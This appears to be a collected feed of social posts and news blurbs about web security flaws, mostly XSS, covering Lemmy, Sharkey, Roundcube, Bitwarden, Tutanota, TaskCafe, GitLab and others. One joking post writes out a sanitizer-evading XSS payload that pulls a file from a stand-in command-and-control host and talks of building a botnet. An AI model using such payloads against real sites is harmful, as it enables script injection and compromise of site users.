Hot off the press! CISA adds CVE-2023-43770 (6.1 medium) Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog.
🔗 (to be replaced later) https://www.cisa.gov/known-exploited-vulnerabilities-catalog
#Sharkey's recent vulnerability and their handling of it is still miles better than #Lemmy's #XSS exploit which actually took down a big instance and is something even more elementary than what Sharkey experienced.
Like seriously, the first thing you do when #Markdown parsing is involved is to sanitize the hell out of it, both in the Markdown input and the HTML output. And you put up a strict #CSP for good measure. Lemmy spectacularly failed on both counts, despite existing as a project for years and a lot more instances (and therefore users, which rivals #Mastodon) using their software!
I can cut some slack for the Sharkey devs here because:
they're relatively new (only months since the project started)
it only affected note imports from #Twitter which is already niche enough
it was easy to mitigate (just disable note import)
it didn't affect single-user instances IIUC
I haven't seen any Sharkey instance get actually exploited by this
they're taking steps to make sure this shit doesn't happen again (haven't seen this from Lemmy yet, and last I checked their CSP is still shit)
So this is not worth blowing over in the #fediverse. Your assessment is exaggerated, this energy could've been spent somewhere else, and you owe the Sharkey devs an apology.
Entwicklungsplattform: Neue GitLab-Versionen beheben zehn Sicherheitslücken
Neben Cross-Site-Scripting und Rechteproblemen beheben die neuen Versionen der Versionsverwaltung auch DoS-Lücken. Das GitLab-Team empfiehlt ein Update.
Sicherheitsforscher finden kritische Fehler in KI-Werkzeugen Ray, MLflow und H2O
Die beliebten Werkzeuge für KI-Anwendungen leiden unter Codeschmuggel, illegitimen Dateimanipulationen und anderen Bugs. Nicht immer sind Updates verfügbar.
Schwere Sicherheitslücken in Monitoring-Software Zabbix behoben
In verschiedenen Komponenten der Monitoringsoftware Zabbix klafften kritische Sicherheitslücken, die Angreifern die Ausführung eigenen Codes ermöglichen.
I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol
Prevention : add .webp extention to ublock origin custom rules or on the whole DNS level.
Introducing Session Hijacking Visual Exploitation (SHVE): A new tool for taking #xss exploitation to the next level - remotely viewing a target's browser
@Tutanota I see that there have been a few #XSS vulnerabilities in the clients in the past. In that case, the client credentials could be stolen from the client.
Is there any mitigation in place for this? Like, would the credentials not be accepted if coming from a different IP, something like that?
Of course the protections against XSS are valuable. But we can't assume there won't be more vulnerabilities in the future.
#Bitwarden, like most cloud-based password managers, has a web vault.Imagine a stored #XSS on that. All your passwords stolen.
Thankfully, you probably aren't viewing untrusted content if you're an individual user (you put the data in yourself and now you're getting it back out). But for organization users, where you can see things created by someone else on your subscription? That could be possible.
Yep, it looks like there is a XSS vulnerability with Lemmy that has been widely exploited, allowing the attackers to steal cookie credentials including potentially those of the site admins.
Some other non-compromised Lemmy instances have taken themselves offline until a fix is available.
Kbin is not affected as far as I can see.
If you have a Lemmy account, don't use it at the moment!
Lemmy instances are being attacked by XSS attack. Stay cautious when viewing post with weird text as it is a JavaScript injection. Bug reported to Lemmy devs https://github.com/LemmyNet/lemmy-ui/issues/1895
Fediverse: Kritische Sicherheitslücken in Mastodon-Software abgedichtet
Betreiber von Mastodon-Instanzen müssen die Server aktualisieren. Ältere Versionen bringen kritische Sicherheitslücken mit, die etwa Codeschmuggel erlauben.
New Bishop Fox security advisory alert 🚨 ! Joan Bono and Luis Adrian De la Rosa Hernandez identified two #vulnerabilities in the TaskCafe #opensource tool.
These vulnerabilities include a high-risk improper access controls issue as well as a cross-site scripting (#XSS) bug. If these two issues were exploited together, an attacker could take over the admin user's account by changing the profile picture to a malicious SVG and change the admin password to the one of their choosing. Read more ⬇ https://bfx.social/43K2M10
📨 Latest issue of my curated #cybersecurity and #infosec list of resources for week #24/2023 is out! It includes, but not only:
→ 🇺🇸 🇨🇳 The US Navy, NATO, and #NASA are using a shady Chinese company’s #encryption chips
→ 🦠 🏢 #Ransomware Group Starts Naming Victims of #MOVEit Zero-Day Attacks
→ ☁️ 🪣 New Supply Chain Attack Exploits Abandoned #S3Buckets to Distribute Malicious Binaries
→ ☁️ #XSS Vulnerabilities in #Azure Led to Unauthorized Access to User Sessions
→ 🇨🇳 🦠 #Barracuda ESG zero-day attacks linked to suspected Chinese hackers
→ 🇷🇺 🇺🇸 Russian national arrested in Arizona, charged for alleged role in #LockBit ransomware attacks
→ 🇷🇺 🇺🇦 Russia-backed hackers unleash new USB-based malware on #Ukraine’s military
→ 🇺🇸 💰 LockBit Ransomware Extorts $91 Million from U.S. Companies
→ 🇷🇺 🇺🇦 #Microsoft identifies new hacking unit within Russian military intelligence
→ 🦠 Fake Researcher Profiles Spread #Malware through #GitHub Repositories as PoC Exploits
→ 🎣 👟 Massive #phishing campaign uses 6,000 sites to impersonate 100 brands
→ 🇨🇳 Chinese Cyberspies Caught Exploiting #VMware ESXi #ZeroDay
→ 🩹 Microsoft #PatchTuesday, June 2023 Edition
→ ☁️ Microsoft: Azure Portal #outage was caused by traffic “spike”
→ 🇨🇳 🇺🇸 #China's cyber now aimed at infrastructure, warns CISA boss
→ 🇰🇷 🇨🇳 Ex-Samsung executive alleged to have stolen tech to recreate chip plant in China
→ 🇨🇭 🗄️ Swiss Fear Government Data Stolen in Cyberattack
→ 🩹 🔐 #Fortinet fixes critical RCE flaw in #Fortigate SSL-VPN devices, patch now
📚 This week's recommended reading is: "The Cyber Effect: An Expert in Cyberpsychology Explains How Technology Is Shaping Our Children, Our Behavior, and Our Values — and What We Can Do About It" by Prof Mary Aiken
Subscribe to the #newsletter to have it piping hot in your inbox every Sunday ⬇️
Applying Content Security Policy in Symfony to Reduce XSS Risks (dev.to)
Protecting applications against XSS attacks is one of the most important things we can do to make...